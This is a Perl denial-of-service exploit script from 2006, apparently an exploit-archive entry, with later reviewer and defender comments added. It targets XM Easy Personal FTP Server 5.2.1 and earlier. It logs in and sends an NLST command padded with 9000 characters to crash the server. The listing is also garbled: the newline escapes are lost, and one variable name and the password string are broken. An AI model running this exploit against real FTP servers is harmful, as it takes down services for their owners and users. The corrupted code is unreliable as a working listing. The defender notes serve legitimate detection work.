
# Title : XM Easy Personal FTP Server <= 5.2.1 Remote Denial of Service Exploit
# Published : 2006-11-04
# Author : boecke


#!/usr/bin/perl
#
# *
# * Title: XM Easy Personal FTP Server <= 5.2.1 'NLST -al' Remote Denial of Service
# * Author: boecke
# * Discovery: boecke
# * Vulnerability Type: Remote Denial of Service
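# * Risk: Low Risk (Requires valid [rest of line truncated in source; the script logs in before sending the command, so presumably a valid FTP login])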
# * Software Affected: XM Easy Personal FTP Server <= 5.2.1
# * Greetings: henrik, str0ke!
# *
#

use IO::Socket;

# Settings for the proof of concept. These are package globals: nothing is
# declared with `my`, and the file enables neither strict nor warnings.

# FTP command that the connection block below sends with a padded argument.
$commandToSend = "NLST -al ";
# Account used for the USER command sent before the oversized request.
$remoteUsername = "anonymous";
# NOTE(review): inside a double-quoted string Perl treats `@kik` as an array to
# interpolate, so as rendered here the value is not the literal address shown.
# A backslash before `@` was presumably lost in extraction - confirm against
# the original.
$remotePassword = "borat@kik.com";
# Target port, taken unvalidated from the second command-line argument.
$remotePort = $ARGV[1];

# Print the two-line banner that names the affected product and the author.
# Takes no arguments and writes only to STDOUT.
# NOTE(review): the literals carry a plain "n" where a newline would be
# expected; the escape backslashes were presumably lost in extraction, and the
# text is reproduced here exactly as it appears on the page.
sub bannerExploit()
{
       my @bannerLines = (
              "n x XM Easy Personal FTP Server <= v5.2.1 Remote Denial of Servicen",
              " x Author: boecken x Discovery: boecke (boecke [at] herzeleid [dot] net)nn",
       );

       print @bannerLines;
}

# Both a host and a port must be given on the command line. Without them,
# show the banner and a usage line, then stop before any network activity.
unless ( scalar(@ARGV) >= 2 )
{
       bannerExploit();
       print " * Usage: perl ftp.pl 192.168.0.1 21nn";
       exit;
}

# Connect to the host and port given on the command line, log in, and send a
# single NLST command whose argument is padded with 9000 filler characters.
# The script never reads from the socket, so it neither checks the login
# replies nor verifies what effect the command had on the server.
#
# Defender notes: on the wire this block produces one FTP control-channel
# command line far longer than any normal directory-listing request, sent
# right after USER/PASS. Flagging or rejecting oversized command lines at an
# FTP-aware proxy or IDS, and disabling anonymous login where it is not
# needed, are the controls relevant to this request pattern. The page lists
# versions <= 5.2.1 as affected and names no fixed release.
#
# NOTE(review): the string literals below end in the plain letters "n" and
# "rn"; the escape backslashes were presumably lost in extraction, so this
# listing is not a faithful copy of the original script.
if ($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $remotePort, Proto => "TCP" ))
{
       bannerExploit();

       print " + Establishing connection at " . $ARGV[0] . ":" . $remotePort . "n";

       # Login step 1: USER is written without waiting for the server greeting.
       print $socket "USER " . $remoteUsername . "rn";

       print " * FTP Username: '" . $remoteUsername . "'n";

       # Fixed delay in place of reading the server's reply to USER.
       sleep( 1 );

       # Login step 2: PASS; whether the login succeeded is never checked.
       print $socket "PASS " . $remotePassword . "rn";

       print " * FTP Password: '" . $remotePassword . "'n";

       # The oversized request: `x` binds tighter than `.`, so this is the NLST
       # prefix, then "A" repeated 9000 times, then the terminator literal.
       print $socket $commandToSend . "A" x 9000 . "rn";

       # Fixed delay again; no response is read before QUIT is written.
       sleep( 3 );

       print $socket "QUITrn";

       # Printed unconditionally: no write to the socket is checked for success.
       # NOTE(review): as rendered, `$remotePortnn` parses as one (unset)
       # variable name, so the port would not appear in this message.
       print " + Sent 9000 bytes of data to $ARGV[0]:$remotePortnn";
}
else
{
       # The constructor returned false: report the failed connection and fall
       # through to the end of the script.
       bannerExploit();

       print " + Failed to establish connection to " . $ARGV[0] . ":" . $remotePort . "n";

}
